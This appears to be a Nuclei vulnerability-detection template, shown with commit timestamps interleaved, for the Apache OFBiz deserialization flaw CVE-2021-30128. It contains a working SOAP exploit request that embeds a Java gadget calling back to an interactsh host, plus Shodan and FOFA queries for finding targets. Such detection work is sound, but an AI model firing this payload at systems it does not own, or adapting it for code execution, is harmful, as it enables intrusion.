2022-11-05 15:08:43 +00:00
id : CVE-2021-30128
info :
name : Apache OFBiz <17.12.07 - Arbitrary Code Execution
author : For3stCo1d
severity : critical
2023-03-27 17:46:47 +00:00
description : Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.
2022-11-05 15:08:43 +00:00
reference :
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
2023-01-05 11:21:19 +00:00
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
2023-07-11 19:49:27 +00:00
- http://www.openwall.com/lists/oss-security/2021/04/27/5
2022-12-23 09:10:25 +00:00
classification :
2023-01-05 11:21:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-12-23 09:10:25 +00:00
cve-id : CVE-2021-30128
2023-01-05 11:21:19 +00:00
cwe-id : CWE-502
2024-05-31 19:23:20 +00:00
epss-score : 0.59411
epss-percentile : 0.97756
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
2022-11-05 15:08:43 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : apache
product : ofbiz
2023-09-06 12:09:01 +00:00
fofa-query : app="Apache_OFBiz"
2024-05-31 19:23:20 +00:00
shodan-query : http.html:"ofbiz"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,apache,ofbiz,deserialization,rce
2022-11-05 15:08:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-05 15:08:43 +00:00
- raw :
- |
POST /webtools/control/SOAPService HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml
2022-12-16 12:55:42 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
2022-11-05 15:08:43 +00:00
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
2022-12-16 12:55:42 +00:00
</map-Key>
<map-Value>
2022-11-05 15:08:43 +00:00
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition : and
matchers :
- type : word
2022-12-23 09:10:25 +00:00
part : interactsh_protocol
2022-11-05 15:08:43 +00:00
words :
- "dns"
- type : word
part : body
words :
2022-12-23 09:10:25 +00:00
- 'value="errorMessage"'
2024-06-01 06:53:00 +00:00
# digest: 4a0a004730450220378972d9f55dda8779aa831590d85f9331f5e4e427991c707692706dd817ebe60221008c5efea71f9e6388f6b558b5224deb9ba7bdc8fc81d19ec3e81a76c431152471:922c64590222798bb761d5b6d8e72950